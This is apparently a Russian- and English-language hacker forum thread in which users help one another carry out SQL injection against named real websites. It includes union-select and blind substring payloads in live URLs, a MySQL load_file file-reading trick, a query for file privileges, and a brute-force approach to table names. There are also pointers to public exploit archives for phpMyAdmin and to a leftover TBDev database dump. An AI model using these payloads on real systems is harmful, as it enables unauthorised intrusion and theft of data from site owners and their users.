maxster, скуля есть, у них просто кривая фильтрация. На этом сайте режется символ запятой в id, точнее всё, что после него, и в итоге запрос принимает вид -0' union select 1' AND `news_date`<='2' ORDER BY `news_date` DESC,`id` Скорее всего, юнионом здесь воспользоваться не получится.
PHP Warning: odbc_exec() [function.odbc-exec]: SQL error: [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'sp.SPECIMEN_ID = 2541 or 1=@@version) -- AND sp.SITENO = si.SITENO'., SQL state 37000 in SQLExecDirect in G:\InetPub\wwwroot\public_site\search.php on line 305 PHP Warning: odbc_fetch_array(): supplied argument is not a valid ODBC result resource in G:\InetPub\wwwroot\public_site\search.php on line 307 такую ошибку получаю, почему -- не режет запрос? как обойти зы с mssql первый раз столкнулся
Помогите с количеством столбцов http://mqup.mcgill.ca/book.php?bookid=-1' order by говорит что их 3, но что-то не так
при 25 выдает полностью запрос Error executing the SQL Query : SELECT authors.*, bookauthors.authorType, bookauthors.bookID FROM bookauthors INNER JOIN authors ON bookauthors.authorID = authors.ID WHERE bookauthors.bookID = -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/* and authorType = 1
lsass.exe а что толку от этого? тут аналогичная канитель( http://www.americanmap.com/catalog/browse.php?root_id=24&cat_id=-1+union+select+77777777777777777/* вроде столбцов один, но ничего не получается
xcedz Спасибо за совет с подзапросами таким способом узнал что версия скулы 5 http://mqup.mcgill.ca/book.php?bookid=1+AND+lower(substring(version(),1,1))='5' что есть таблица authors http://mqup.mcgill.ca/book.php?bookid=1+AND+lower(substring((select+table_name+from+information_schema.tables+limit+17,1),1,1))='a' .... итд Все понял буду знать!
Hi, what do you do, if you get a SQL Injection, and the version() is < 5.0 ? If < 5.0 there isn't any Information_Schema. Do you just guess the right table/column names? Load_File is a possibility too, but it doesn't work each time. Thank you
Lidloses_Auge If I'm not mistaken there is no other way to get some information. You can use lists of table names it'll be like a b-forse))) look here for table base http://forum.antichat.ru/nextnewesttothread49622.html
There's no another way to check if a table with current name exists. For instance u can write a script which will check them one by one from a dictionary as the chance of some tables' with default names existance is rather high.
I'm just searching for more possibilities of using an injection like: load_file benchmark ascii(lowerstring(substring .... information_schema into dumpfile you know more interesting ways?
Подскажите мне пожалуйста вот когда я использую load_file() я могу сделать так - load_file('/index.php')? и если я так сделаю то я увижу исходник страницы? И как вообще узнать что эта функция работает? только если то что я в ней указал вылезит на экран так?
Yes you can, but you've to look in the Sites Source, for the source you want to display. E.g.: load_file('/index.php') then you've to watch the source and look after the index.php. In some cases the index.php isn't printed correctly so you've to watch in the source. You can also hex-encode the load_file and decrypt it later.
увидишь, только если в корне есть файл index.php (он там нафиг не нужен) В качестве аргумента в эту функцию надо передавать реальный путь, а не относительный (можно конечно и относительный, но толку в этом немного, так как тогда нужно будет указывать путь относительно каталога файлов mysql сервера) узнать есть ли файловые привилегии у пользователя можно например так: Code: union select file_priv from mysql.user where user=left(user(),locate(0x40,user())-1)/* но это только если есть доступ к mysql.user если нет то только с помошью анализа результата функции, все неудобство в том, что если файла не существует или есть ограничения на чтение файла (например права доступа) то функция возвращает null а не выплевывает ошибки
Кароче.Возможно повторп,но прошу не пинать. Есть 2 вопроса: 1)Как можно ломануть phpmyadmin; 2)Есть трекер.Движко TBDev.Там,на трекере есть папка с файлом дампа Базы Данных.ЕЕ надо удалять после устаовки.Но ее не удалили. помоему там есть права на запись,хотя могу ошбатсо.НУ чем ето может помочь?И вообще кто-нибудь знает как ломать ети двиги? -----пример----- http://deniska.ath.cx/ - только помоему рабаотает после 14.00
ikolla$$, 1)http://milw0rm.com/search.php в строке поиске пишешь phpmyadmin. То же самое можно проделать на securitylab.ru, securityfocus.com и т.д. 2)Ну попробуй скачать этот дамп и посмотреть что в нем есть интересного. Хотя, имхо, ничего в нем нет интересного, ибо там скорее всего просто дефолтное строение бд без значений, которые потом уже вбивались.
Народ, а как выполнить запрос, если полей там около тысячи ?)))).В URL ведь количество вводимых символов ограничено, потому запрос через юрл никак(( Пробывал вот POST запрос: GET /page.html?id=5 HTTP/1.1 Accept: */* Accept-Language: uk User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SQL_TOOL) Host: host.ru Connection: Close Content-Type: text/html Content-Length: 2850 %20union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368,369,370,371,372,373,374,375,376,377,378,379,380,381,382,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,420,421,422,423,424,425,426,427,428,429,430,431,432,433,434,435,436,437,438,439,440,441,442,443,444,445,446,447,448,449,450,451,452,453,454,55,456,457,458,459,460,461,462,463,464,465,466,467,468,469,470,471,472,472,474,475,476,477,478,479,480,481,482,483,484,485,486,487,488,489,490,491,492,493,494,495,496,497,498,499,500,501,502,503,504,505,506,507,508,509,510,511,512,513,514,515,516,517,518,519,520,521,522,523,524,525,526,527,528,529,530,531,532,533,534,535,536,537,538,539,540,541,542,543,544,545,546,547,548,549,550,551,552,553,554,555,556,557,558,559,560,561,562,563,564,565,566,567,568,569,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,595,596,597,598,599,600,601,602,603,604,605,606,607,608,609,610,611,612,613,614,615/* Что я сделал не так? Объясните пожалуйста)).Сайт сказать не могу, ибо сам хочу попробывать ))
помогите разобраться с такой ересью ) http://www.9000rpm.ru/service.html?id=1+group+by+4/* нету выводимых полей
